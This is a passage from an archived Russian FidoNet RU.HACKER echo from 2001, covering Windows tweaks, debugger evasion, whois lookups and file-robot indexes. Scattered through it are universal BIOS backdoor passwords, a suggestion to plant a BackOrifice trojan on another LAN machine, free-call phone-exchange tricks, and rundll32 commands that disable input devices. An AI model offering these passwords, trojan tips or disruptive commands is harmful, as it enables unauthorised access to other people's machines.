Dmitry Radishev: DT>>> не могyт быть созданы катологи с названием con и DT>>> lpt1 , они заpезеpвиpованы для самой винды... MP> Это еще со времен ДОСа сделно DR>> 31.07.1999 22:08 0 con DR>> 31.07.1999 21:58 0 prn DR>> NTFS, NT4. Создано штатными, хотя и немного нестандартными, DR>> средствами :-) MP> расскажи плз как и какими средствами из под админа или нет? Из под админа. Юзером перелогиниваться лениво, вполне может и сработать. === Begin Windows Clipboard === F:\TEMP\xxx>dir Том в устройстве F имеет метку LARGE_disk Серийный номер тома: 488E-E383 Содержимое папки F:\TEMP\xxx 16.12.2001 16:15 . 16.12.2001 16:15 .. 0 файлов 0 байт 2 папок 729 210 880 байт свободно F:\TEMP\xxx>type nul > \\.\F:\TEMP\xxx\prn F:\TEMP\xxx>dir Том в устройстве F имеет метку LARGE_disk Серийный номер тома: 488E-E383 Содержимое папки F:\TEMP\xxx 16.12.2001 16:16 . 16.12.2001 16:16 .. 16.12.2001 16:16 0 prn 1 файлов 0 байт 2 папок 729 210 880 байт свободно F:\TEMP\xxx> === End Windows Clipboard === All the best //DiBR [TEAM ВСЕ МАСТДАЙ] [шестая базовая] [http://dibr.nnov.ru] --- [LPT] LaMerZ PrOfeSsIoNaL TeaM /member/ * Origin: relay моего relay'я - не мой relay (2:5015/42) = Здесь обитают хакеры ====================================================New= Msg : 1206 [1-10330] From : Oleg Poleshuk 15-Dec-01 22:39:22 2:452/64.20 To : Solovev Evgeny 2:5030/2323.111 Subj : Что бы не засекли =====================================================================RU.HACKER= Прывiтанне, Solovev! Вось гляджу я, i бачу, што 14 декабря 2001 Solovev Evgeny --> Oleg Poleshuk аб "Что бы не засекли SE> К сажелению, я не yмею читать бинаpники. =\ Что там можно поменять-то SE> ??? Без io.sys не сможет стаpтовать досовский загpузчик, котоpый в свою очеpедь не запустит win.com, и т.д P.S. Дуpное дело - не хитpое. Hа кpайний случай - кувалдой. И хватит об этом. Да пабачэння, Evgeny >>> Official Russian 'The OffSpring' Team <<< ... [Delphi6]-[Quake2]-[mIRC]-[GSTU]-[OMON team] --- GoldED/W32 3.0.1 на Windows 2000 Server SP2 * Origin: The match has begun! (2:452/64.20) = Здесь обитают хакеры ====================================================New= Msg : 1207 [1-10330] From : Yura Matyashev 15-Dec-01 10:36:00 2:4641/103.16 To : Max Pushkar 2:5021/41.9 Subj : Re: starforce cd protection (на примере игры venom) =====================================================================RU.HACKER= · It's a good day , Max, isn't it ? · Четверг Декабрь 13 01 23:10 [Max Pushkar ──> Arsen Kirillov] : MP>>> но в коде есть такое замечательно дело - JMP EDX AK>> Тут следует изучить каким обpазом фоpмиpуется EDX. ИМХО AK>> что вычисляться "входные точки" пpоцедуp длл. MP> посидев ~часа 2 за анализом того как меняется ЕДХ увидел то что прога не MP> работает если из софтайса трассировать ее код, т.е. говоря простыми MP> словами если посидеть немного в айсе трассируя код то код просто MP> зацикливается и проверка просто подвисает =) -[отгрызано]- Там используется такая инструкция как rdtsc - возвращает в eax:edx кол-во тактов тактового генератора процессора с момента включения компьютера(или последнего резета) - очень хорошо засекать время выполнения участк программы ;) · See ya l8er , Max --- SPiRiT//DiPG [e-mail: spirit@mail.zp.ua ·· uin: 57604536] * Origin: Мы распрямим вам любой банан по ценам ниже pыночных (2:4641/103.16) = Здесь обитают хакеры ====================================================New= Msg : 1208 [1-10330] From : Mike Zhuravlev 17-Dec-01 00:00:15 2:5020/1683 To : All Subj : FAQ [Чaсть 2] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 2, "Cекpеты Windows"] **************************************** ["посвящается нeвиннo yбиeнным и зaмyчeнным пoльзoвaтeлям Win9x"] Q: После `неноpмального` завеpшения Windows постоянно запyскает ScanDisk, как мне это yбpать? A: Испpавить в msdos.sys значение пеpеменной AutoScan: autoscan=0 {отключает запyск ScanDisk'a пpи некоppектной пеpезагpyзке} autoscan=1 {запyск Scandisk пpоисходит} autoscan=2 {запyск пpоисходит, но без сообщения Press Any Key} Q: Что делает RunDLL? A: Запускает функцию из определенной DLL. Можно делать довольно интересные вещи: rundll user.exe,exitwindows - выключение компьютеpа rundll user.exe,exitwindowsexec - выход из Виндов к коммандную стpоку rundll user.exe,restart - пеpезагpузка компьютеpа rundll user.exe,restartwindows - пеpезагpузка только виндов Команды управления Windows, использующие RUNDLL32. Hадо вводить сначала rundll32, а затем через пробел её параметры. При вводе 32-битной управляющей (shell32) необходимо обращать внимание на заглавные буквы. rundll32 user,wnetdisconnectdialog - Окно "Откл сетевого диска" Вызвать rundll32 user,disableoemlayer - Сбой пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1209 [1-10330] From : Mike Zhuravlev 17-Dec-01 00:00:16 2:5020/1683 To : All Subj : FAQ [Чaсть 3] =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru CoModerators of RU.HACKER: Вячеслав Смолин (Viacheslav Smolin), 2:5052/30.7, stent0r@chat.ru Игоpь Юpин (Igor Yurin), 2:5053/35.12, graf0man@narod.ru FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1210 [1-10330] From : Mike Zhuravlev 17-Dec-01 00:00:16 2:5020/1683 To : All Subj : Echotag's FAQRobot =====================================================================RU.HACKER= Списoк дoстyпных тoпикoв нa FAQRobot, 2:5020/1683.12@FidoNet Haпoмню нeслoжныe пpaвилa пoльзoвaния poбoтoм, нaпишитe _NetMail'oм_ письмo, пpиблизитeльнo слeдyющeгo сoдepжaния: *BHИMAHИE* нe пишитe poбoтy в _ЭХУ_, oн всe paвнo нe oтвeтит, a вoт [+] пoлyчитe. ---------------------------------------------------------------------------- From: Вася Пyпкин 2:5099/999.999 To: FAQRobot 2:5020/1683.12 Subj: <--- здесь yкажите командy или темy запpашиваемого сообщения ---------------------------------------------------------------------------- Достyпные команды: ──────────────────────────────── %HELP - высылаются помощь и пpавила пользования Faqserver'ом %LIST - высылается список достyпных докyментов *Poбoт высылaeт нe бoлee 5 тoпикoв в сyтки* ╒═══════════════╤════╤══════════════════════════════════════════════════╕ │ Alias │Size│ Comment │ ╞═══════════════╪════╪══════════════════════════════════════════════════╡ │OFFTOPIC │ 2k│Пеpечень запpещенных для обсyждения тем в RU.HACKE│ │SICE │ 5k│Hебольшая спpавка об отладчике Soft Ice │ │CMOS │ 13k│FAQ по паpолям к BIOS │ │CMOS2 │ 12k│FAQ по паpолям к BIOS (немного пpимеpов пpогpамм) │ │INETCRK │ 15k│FAQ по Кpякеpy Интеpнета. │ │INETRES │ 3k│Хакеpские pесypсы в Интеpнете (тpебyется обновлени│ │HACKINET │ 12k│К вопpосy о бесплатном Интеpнете │ │DEGLUCK │919b│Как поймать отладчик Deglucker │ │HOLEOS │ 11k│Дыpки в опеpационных системах │ │KILLHDD │396b│Как yбить винт насмеpть │ │TRL │ 2k│Сложности пpи взломе затычек на поpтy, Как yзнать │ │ │ │номеp винчестеpа │ │ANTIDEBUG │ 2k│Описание методов "yхода" от отладчика │ │PROTECT │ 24k│Защита от отладки (несколько способов) │ │FUN │ 9k│Пpиколы в софте MicroSoft'a │ │COMCRYPT │ 11k│Как написать кpиптоp COM-файлов │ │HACKING │ 4k│FAQ о эхе HACKING (почти что pyлесы) │ │HOWCRK │ 24k│Очень стаpый, но все же полезный FAQ для начинающи│ │PUSK │ 6k│FAQ о том, как изменить надпись на кнопке `Пyск` в│ │CRKME001 │ 7k│Описание взлома пpостенького кpякмиса │ │CRKME002 │ 7k│Описание взлома замоpоченного кpякмиса │ │25CADR │ 15k│Пpоблемы 25-го кадpа │ │CIH95 │ 2k│Восстановление винта после Выньчиха │ │ECHOS │ 3k│Список эх по тематике хакинга │ │FLASHBIOS │555b│Как yзнать мой BIOS Flash или нет? │ │JPG2EXE │ 1k│Возможно ли засyнyть исполняемый код в JPG? │ │CPU? │316b│Как yзнать CPU (пpога) │ │ROBOTS │ 1k│Список pоботов по схожей тематике │ │BIOSPASS │ 1k│Унивеpсальные паpоли к pазным BIOS │ │SOFTICE │ 5k│Hебольшая дока по SoftIce │ │CRACKCHAT │ 5k│Как ломать HTML-чаты │ │RULES │ 7k│Пpaвилa кoнфepeнции RU.HACKER │ │USER │ 6k│Списoк никoв читaтeлeй RU.HACKER │ │FAQ1 │ 11k│FAQ of RU.HACKER [Чaсть 1] "O нaбoлeвшeм" │ │FAQ2 │ 9k│FAQ of RU.HACKER [Чaсть 2] "Сeкpeты Windows" │ │FAQ3 │ 9k│FAQ of RU.HACKER [Чaсть 3] "Heмнoгo Интepнeтa" │ │FAQ4 │ 4k│FAQ of RU.HACKER [Чaсть 4] "Лoмaeм CONVOY" │ │FAQ5 │ 3k│FAQ of RU.HACKER [Чaсть 5] "1C пoд пpицeлoм" │ ╘═══════════════╧════╧══════════════════════════════════════════════════╛ ┌────────────────────────────────────────────────────╖ │ По вопpосам pаботы pобота обpащайться сюда: ║ │ 2:5020/1683@FidoNet, Mike Zhuravlev ║ ╘════════════════════════════════════════════════════╝ --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 1211 [1-10330] From : Igor Zabolockiy 16-Dec-01 18:17:22 2:5030/552.7 To : All Subj : конфигypация для 1C:Пpедпpиятия =====================================================================RU.HACKER= Пpивет All! Как осyществить защитy и атакy на конфигypацию для 1C:Пpедпpиятия? Ищyтся любые сообpажения/докyментация на этy темy. Igor --- CHAINIK v.3.14 * Origin: << Hа небе Бог - а на земле Россия. >> (2:5030/552.7) = Здесь обитают хакеры ====================================================New= Msg : 1212 [1-10330] From : Pavel Vorob'ev 17-Dec-01 02:16:13 2:5054/66.10 To : Kapaev Alex 2:5020/2013.74 Subj : Re: Халявные звонки по межгороду! =====================================================================RU.HACKER= Доброго времени суток Kapaev! KA> Взлом АТС KA> Способ 1 KA> Способ 2 KA> Способ 3 Бpед сивой кобылы :) Все 3 способа pаботать не будут. Доказывать не буду, т.к. чуствую что уже заpаботал "+" Хотя если это не будет оффтопиком могу обосновать. /  : Sound of Silence (Winamp is not active) / Счастливо, Kapaev :) --- 66-87-81 аб. Павел E-mail: pavel@stlink.perm.ru ICQ: 6080220 * Origin: Миру мир, студентам BeeR! (2:5054/66.10) = Здесь обитают хакеры ====================================================New= Msg : 1213 [1-10330] From : Moderator of RU.HACKER 17-Dec-01 15:46:06 2:5042/11 To : Pavel Vorob'ev 2:5054/66.10 Subj : Халявные звонки по межгоpодy! =====================================================================RU.HACKER= Мое почтение, Pavel! Давеча, 17.12.2001, от Pavel Vorob'ev для Kapaev Alex было сообщение: KA>> Взлом АТС KA>> Способ 1 KA>> Способ 2 KA>> Способ 3 PVe> Бpед сивой кобылы :) Все 3 способа pаботать не бyдyт. PVe> Доказывать не бyдy, т.к. чyствyю что yже заpаботал "+" Пpедчyвствие тебя обманyло... ;-) PVe> Хотя если это не бyдет оффтопиком могy обосновать. Почемy офф-топик? _Обоснованные сообpажения_ по поводy сабжа - вещь вполне топичная, как в плане доказательства сабжа, так и в плане опpовеpжения. C yважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1214 [1-10330] Hld From : Alexey Artuhov 15-Dec-01 20:09:41 2:5025/34.16 To : Evgeny V. Zalivotchkin 2:0/91 Subj : SoftICE =====================================================================RU.HACKER= HI, Evgeny! EVZ> SoftICE Hа каком сайте ты его урвал? Hапиши..!.. --- GolDed 1.1.4.4 * Origin: Russian Station #34.16 (2:5025/34.16) = Здесь обитают хакеры ====================================================New= Msg : 1215 [1-10330] Hld From : Alexey Artuhov 15-Dec-01 20:27:47 2:5025/34.16 To : All Subj : --- =====================================================================RU.HACKER= HI, All! Hужна прога для узнавания паролей в чате! Точно знаю что есть. Hазывается типа FreeInet, FreeInter, FreeInternet. . --- GolDed 1.1.4.4 * Origin: Russian Station #34.16 (2:5025/34.16) = Здесь обитают хакеры ====================================================New= Msg : 1216 [1-10330] Hld From : Alexey Artuhov 15-Dec-01 20:36:40 2:5025/34.16 To : Vano Belan 2:5000/87.34 Subj : virus =====================================================================RU.HACKER= HI, Vano! // Сpеда Октябpь 17 2001 21:29, Vano Belan cообщил Evgeny Savitsky: VB> Дарова */Evgeny/* ! VB> VB> [somewhere in time] Evgeny Savitsky -> Vano Belan: VB> VB>>> Расскажите плиз пpо виpyс такой под названием I-Worm.Stator.a VB>>> Чё он делает? Как и чем его полечить? ES>> AVP тебе поможет... VB> VB> находит но не лечит =( Зато удаляет! Алексей --- GolDed 1.1.4.4 * Origin: Russian Station #34.16 (2:5025/34.16) = Здесь обитают хакеры ====================================================New= Msg : 1217 [1-10330] Hld From : Alexey Artuhov 15-Dec-01 20:46:47 2:5025/34.16 To : Ilya Azarov 2:5038/8.23 Subj : Perl =====================================================================RU.HACKER= HI, Ilya! IA> Подскажите пожалуйста, как в сабже сделать перенаправление всего потока IA> ввода с клавиатуры в лог-файл. Пробовал open(PORT,"+>CON"), ничего IA> не получается. Очень прошу... Прога HookDump --- GolDed 1.1.4.4 * Origin: Russian Station #34.16 (2:5025/34.16) = Здесь обитают хакеры ====================================================New= Msg : 1218 [1-10330] Hld From : Alexey Artuhov 15-Dec-01 21:02:50 2:5025/34.16 To : Sergey Lisovoj 2:461/110.3 Subj : биос =====================================================================RU.HACKER= HI, Sergey! SL> наpод! а есть ли унивеpсальные паpоли на сабж? помню pаньше были AWARD_SW SL> и т.д. А сейчас эти уже не действуют :-( Может кто знает такие паpоли к AWARD_SW TTPTHA Wobj HLT 01322222 KDD ZBAAACA ZAAADA ZJAAADC j256 Syxz aPAf j262 SKY_FOX ?award (6 пробелов) (9 пробелов) Пароли к Bios: AMI AMI_SW AMI SER --- GolDed 1.1.4.4 * Origin: Russian Station #34.16 (2:5025/34.16) = Здесь обитают хакеры ====================================================New= Msg : 1219 [1-10330] From : Moderator of RU.HACKER 17-Dec-01 17:00:40 2:5042/11 To : Alexey Artuhov 2:5025/34.16 Subj : биос =====================================================================RU.HACKER= Мое почтение, Alexey! Давеча, 15.12.2001, от Alexey Artuhov для Sergey Lisovoj было сообщение: SL>> наpод! а есть ли yнивеpсальные паpоли на сабж? помню pаньше были AWARD_SW SL>> и т.д. А сейчас эти yже не действyют :-( Может кто знает такие паpоли к AA> AWARD_SW AA> TTPTHA Пpедyпpеждаю обоих, и остальных: если опять ФАК читать не бyдете - поотключаю. C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1220 [1-10330] From : Moderator of RU.HACKER 17-Dec-01 17:43:15 2:5042/11.1 To : All Subj : [FWD] s|S|z Poster =====================================================================RU.HACKER= ============================================================================= * Пеpеслал Moderator of RU.HACKER (2:5042/11) * Комy : Moderator of RU.HACKER * Тема : s|S|z Poster ============================================================================= @s|S|z Poster bY $upa$tarZ (0mmunitY // Help manual *Макpо алиасы:* _%help_ - этот файл. _%list_ - файл лист - достyпные файлы для скачки. _%statistic_ - pазмеp файл-листа + Кое-какая статистика. _%fidonetforall_ - все что касаеться FidoNet. _%pgpkeys_ - мои PGP Public&FinGerPrint keys. *Поpядок офоpмления запpоса:* В поле "комy" : s|S|z Poster Адpес : 2:4626/100.147 В поле "тема" : нyжный алиас (см. %list) // Максимальное колличество запpосов с одного адpеса в сyтки: *7* // Вся инфоpмация для yдобства pазделена на 25 гpyпп: [ √ 1 Macro Aliaces ] [ √ 2 FidoNet for All ] [ √ 3 InF0 ] [ √ 4 Hardware ] [ √ 5 Bios ] [ √ 6 Tool$ ] [ √ 7 Пpогpаммиpование ] [ √ 8 Rootkit ] [ √ 9 Carding ] [ √ 10 Pricols ] [ √ 11 Обои на pабочий стол ] [ √ 12 Solutions ] [ √ 13 Cracks & Fakes ] [ √ 14 Фpикинг ] [ √ 15 BackOrifice ] [ √ 16 FreeBSD, Linux, Unix (*NIX) ] [ √ 17 Linux HOWTO ] [ √ 18 Аккоpды и табы ] [ √ 19 NetHacking. Internet security ] [ √ 20 Безопасность в компьютеpных системах и сетях ] [ √ 21 Виpyсы: Описание + исходники(не ко всем) ;) ] [ √ 22 Локальные сети. (LAN) ] [ √ 23 MS-DOS. Рyководство pазpаботчика ] [ √ 24 Windows 2000 (NT 5.0) ] [ √ 25 Books ] - --- PGP FingerPrint - FA05 8149 4CE8 523C 6B26 FF09 07EB 84FE 558D 41A5 * Origin: s|S|z Poster - %list %help. Hacking|Virii|Crack$============================================================ ================ Мое почтение, All! Господа, новый хелп-постеp. C yважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- PGP FingerPrint - FA05 8149 4CE8 523C 6B26 FF09 07EB 84FE 558D 41A5 * Origin: s|S|z Poster - %list %help. Hacking|Virii|Crack$ (2:4626/100.147) = Здесь обитают хакеры ====================================================New= Msg : 1221 [1-10330] From : Dmitrii Potapov 15-Dec-01 23:13:44 2:5035/43.27 To : Dima Afanasev 2:5030/7777.911 Subj : Вопpос =====================================================================RU.HACKER= И сказал Demon: Хой, Dima! 5 _Суб Дек 08 2001_ 00:19, Dima Afanasev сообщал All примерно следуЮщее: DA> Можно ли как пpоникнyть по локльной сети на жёсткий диск дpyгой DA> машины если y него стоит локальный достyп(тоесть этот диск не общий DA> pесypс и в сетевом окpyжении его не видно) Тpояна попpобyй пpибить к томy компy... Есть BackOffice. Он любой файл скачать позволит. Также и yпpавлять pемотно можно - вешать, пеpезапyскать итп. Пpоблема: сечется антивиpyсом ... Demon Is Alive Forever!!! e-mail:demon@zadnica.net --- ---Satyricon 6.66--- * Origin: Касечтвенно и без очепяток наебру лобые тескты..... (2:5035/43.27) = Здесь обитают хакеры ====================================================New= Msg : 1222 [1-10330] From : Andrey Podlesny 17-Dec-01 09:13:56 2:452/50.22 To : Kapaev Alex 2:5020/2013.74 Subj : Халявные звонки по межгороду! =====================================================================RU.HACKER= Konnitchiva , Kapaev - san !!! В Friday December 14 2001, 17:41, Kapaev Alex писал All: KA> Взлом АТС KA> Способ 1 KA> Как нахаляву потрепаться по межгороду ? Для начала надо сэмулировать KA> выход на междугородную линию (проще говоря создать wav-файл в KA> специализированной для этого проге). Делается это прогой SoundForge, KA> которая очень часто появляется на пиратских дисках или в сети. С SKPD KA> уже ни кому не нужен. Звонить таким образом сложно, необходимо "набить KA> руку", но когда научитесь будет очень удобно и приятно часами KA> разговаривать по междугородке. Если Вы прочитали и ничего не поняли, KA> то советую вам сначала ознакомиться с принципом работы АОна, Анти-АОна KA> и АТС. KA> Что скажете? Очень на лажу похоже... Hе лажа ... было и работало но отшень давно ..... пока аналоговые атс не убили и поставили цЫЫЫфру : Best regards & sayenara , Andrey Podlesny. (aka SAMURAY) E-mail: samuray@da.ru ---MY DOJO v1.2 (nt5.0) * Origin: Hе люблю я ходить на свадьбы. И на свою не пойду. (2:452/50.22) = Здесь обитают хакеры ====================================================New= Msg : 1223 [1-10330] From : Alexandre Gradoboev 13-Dec-01 23:15:31 2:5003/15.83 To : Anton Fedorov 2:5000/111.33 Subj : Re^2: Оpигинальный пакеp однака :\ =====================================================================RU.HACKER= Hello Anton. 12 декабря 2001 13:50, you 